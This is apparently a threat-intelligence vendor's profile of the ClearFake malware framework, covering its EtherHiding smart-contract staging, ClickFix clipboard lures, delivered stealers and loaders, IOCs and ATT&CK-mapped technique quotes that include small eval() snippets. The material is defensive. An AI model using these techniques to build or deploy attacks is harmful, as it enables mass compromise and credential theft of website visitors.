ClearFake
ClearFake is a malicious JavaScript framework and malware campaign active since July 2023 that is deployed on compromised legitimate websites, frequently WordPress sites, to deliver follow-on malware via drive-by and ClickFix-style social engineering. Early ClearFake activity displayed fake browser update prompts, including fake Chrome update pages, and later evolved into fake browser error dialogs, fake Google reCAPTCHA prompts, and fake Cloudflare Turnstile or verification pages. In current variants, the injected website script silently stages a malicious command in the victim’s clipboard and instructs the user to press Win+R, paste, and execute it, causing self-compromise on Windows systems. ClearFake has also delivered macOS-specific payloads based on browser OS detection.
A defining characteristic of ClearFake is its use of EtherHiding: malicious JavaScript, routing logic, and related configuration are stored in smart contracts on the Binance Smart Chain, including BSC testnet, and retrieved through public RPC endpoints. Multiple reports describe ClearFake fetching Base64-encoded, gzip-compressed, or otherwise obfuscated JavaScript from blockchain-hosted content, decoding it, and executing it with eval(). Researchers also observed anti-analysis logic in on-chain stages, use of multiple smart contracts for Windows and macOS payload delivery, and a separate smart contract used as a public UUID tracker to avoid reinfecting victims and to record compromises. Reported blockchain-related indicators include wallet addresses 0xd71f4cdC84420d2bd07F507b7A4F998b4c2d52c9, 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53, 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA, and 0x8FBA1667BEF5EdA433928b220886A830488549BD; smart contract addresses 0xA1decFB75C8C0CA28C10517ce56B710baf727d2e, 0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff, and 0xf4a32588b50a59a82fbA148d436081A48d80832A; and RPC endpoints such as bsc-testnet-rpc.publicnode[.]com, bsc-testnet.drpc.org, and data-seed-prebsc-1-s1.bnbchain[.]org:8545.
ClearFake has been associated with delivery of numerous malware families over time. Reported payloads include Amadey, IDAT Loader, Hijack Loader, SectopRAT, ACRStealer, Lumma Stealer, Stealc, Vidar Stealer, and AMOS Stealer for macOS. In one analyzed 2025 chain, malicious PowerShell launched mshta.exe against remote scripts masquerading as media files, leading to Emmenhtal Loader v2 and ultimately Lumma Stealer. Trend Micro reported a later chain delivering SectopRAT, a .NET RAT, and ACRStealer, a C++ infostealer that steals passwords, cookies, credit card data, and cryptocurrency wallet information. Recent reporting also describes ClearFake shifting from mshta.exe to proxy execution via the legitimate Windows script C:\Windows\System32\SyncAppvPublishingServer.vbs to launch hidden PowerShell, and using jsDelivr to host later-stage payloads.
Infrastructure and scale reporting indicate a broad and resilient operation. Researchers reported over 9,300 potentially compromised websites tied to one ClearFake wallet string as of February 2025, prior telemetry suggesting roughly 200,000 unique users were potentially exposed in July 2024, and public smart-contract UUID tracking suggesting close to 150,000 likely infections since August 2025. Additional infrastructure linked to ClearFake includes fake verification and payload-delivery domains under .in.net, Cloudflare-backed delivery clusters, and shared hosting or IOC associations with other malware families. Sample-level indicators directly associated with ClearFake include the malicious HTML file f5DRapmtAHwa9nHy.html with SHA256 100cff1fb7d791f474d4c1d95428f8ecb2e8961824d7817b473920551da37ae5. Other reported indicators in ClearFake chains include put34b.camp, libvlccore.dll, pythonw.exe, helper.py, cdn.jsdelivr[.]net/gh/clock-cheking/expert-barnacle/load, and historical domains such as akademipraktik.com, stats-best.site, and multiple Keitaro- and Cloudflare Workers-hosted staging URLs.
ClearFake is consistently described as a ClickFix-style framework operated by threat actors and as a major user of EtherHiding within that ecosystem. It primarily targets website visitors through compromised web infrastructure rather than direct exploitation, relying on fake updates, fake CAPTCHA or verification prompts, clipboard hijacking, and trusted services such as blockchain RPC endpoints and CDNs to evade takedown and traditional URL or IP blocking.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
These fake browser update pop-ups were generated through a malicious JavaScript framework that ProofPoint researchers previously dubbed CLEARFAKE.
“VexTrio Viper runs the largest and oldest known TDS with over 165 affiliates including SocGholish and ClearFake.”
Techniques & procedures
18 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniquesMITRE ATT&CK Mapping ... Resource Development Acquire Infrastructure: Domains T1583.001 joscramp[.]top + 7 co-hosted domains via Dynadot
MITRE ATT&CK Mapping ... Resource Development Acquire Infrastructure: Server T1583.004 Google Cloud VM with custom DNS/mail infrastructure
Initial Access
2 techniques"This prompt falsely presents itself as a browser update... Once the user interacts with the 'Update Chrome' button, the browser is redirected to another URL where a binary automatically downloads"
The campaign leverages multiple delivery and social engineering mechanisms, including fake BSOD screens, reCAPTCHA prompts, and Cloudflare CAPTCHA challenge pages. All these ClickFix lures ultimately lead to OS-specific payload deployment.
Execution
2 techniquesThe initial JavaScript evaluates the code using the following function: eval(`(async(orchid)=>{${ds}})(orchid);`)... await eval(`(async () => { ${haiku} })()`);
"After the user double clicks the fake update binary, it will proceed to download the next stage payload."
Stealth
6 techniquesOn the infected website, the backdoor injects malicious inline scripts that leverage both XOR and Base64 obfuscation to evade detection.
the returned value of the functions of the ABI are strings that are compressed with the gzip algorithm and base64 encoded... atob to decode the base64 then pako.gunzip to decompress... Download the AES key from the contract... decrypt it with the AES-GCM algorithm.
"ChromeSetup.exe downloads and executes the Microsoft Software Installer (MSI) package..." and "switches intended to avoid detection: /qn /quiet /norestart"
This stage performs several environment checks, such as inspecting for headless browser frameworks and evaluating the system’s user-agent string. If automated browsing behavior is detected, the execution chain terminates.
Discovery
4 techniquesFingerprint the victim using the User-Agent: The operating system; The web browser.
This stage performs several environment checks, such as inspecting for headless browser frameworks and evaluating the system’s user-agent string. If automated browsing behavior is detected, the execution chain terminates.
Collection
1 techniquedeceiving users into copying and executing a given malicious PowerShell code... The command is copied into the user’s clipboard data.
Command and Control
4 techniquesMITRE ATT&CK™ Matrix - Windows ... Command and Control Standard Application Layer Protocol
Threat actors store data (for example C2 configuration) or code on a public blockchain... they can access it through a legitimate API endpoint... SharkStealer and ArechClient2... pull their C2 configuration from a smart contract... ZigCryptoStealer... uses smart contracts to receive their C2 configuration.
ClearFake fetches and executes base64 encoded and gzip compressed code... The initial smart contract delivers an obfuscated JavaScript payload... dynamically retrieves platform specific second-stage payloads... Java Stealer... continuously monitors the clipboard and further downloads additional payloads.
ErrTraffic initially calls the getUrlFromContract() function to retrieve the command-and-control (C2) panel domain from a blockchain smart contract. Instead of hardcoding the server address directly in the script, the malware queries multiple Polygon RPC endpoints
IOCs tracked for this family
222 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
28 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A web-based malware delivery framework that compromises legitimate websites and uses BNB Smart Chain testnet smart contracts to host and retrieve malicious JavaScript, enabling resilient payload delivery and anti-takedown command routing. It uses fake CAPTCHA/ClickFix lures and OS-aware staging to deliver follow-on malware to Windows and macOS victims.
A malware family using EtherHiding to fetch additional JavaScript payloads; it retrieves and executes base64-encoded, gzip-compressed code from smart contracts.
A ClickFix-style JavaScript framework that embeds malicious inline scripts into compromised websites, uses multiple smart contracts and blockchain RPC endpoints for staged delivery, performs environment checks, and serves OS-specific ClickFix prompts and payloads.
Loader malware family listed as operating from the same subnet.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.